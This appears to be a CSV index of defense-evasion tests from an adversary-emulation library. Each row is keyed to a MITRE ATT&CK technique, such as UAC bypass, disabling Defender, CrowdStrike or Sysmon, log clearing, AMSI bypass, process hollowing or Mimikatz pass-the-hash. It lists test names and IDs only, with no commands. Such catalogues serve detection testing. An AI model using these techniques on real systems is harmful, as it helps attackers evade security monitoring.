defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
defense-evasion,T1562.001,Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1070.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
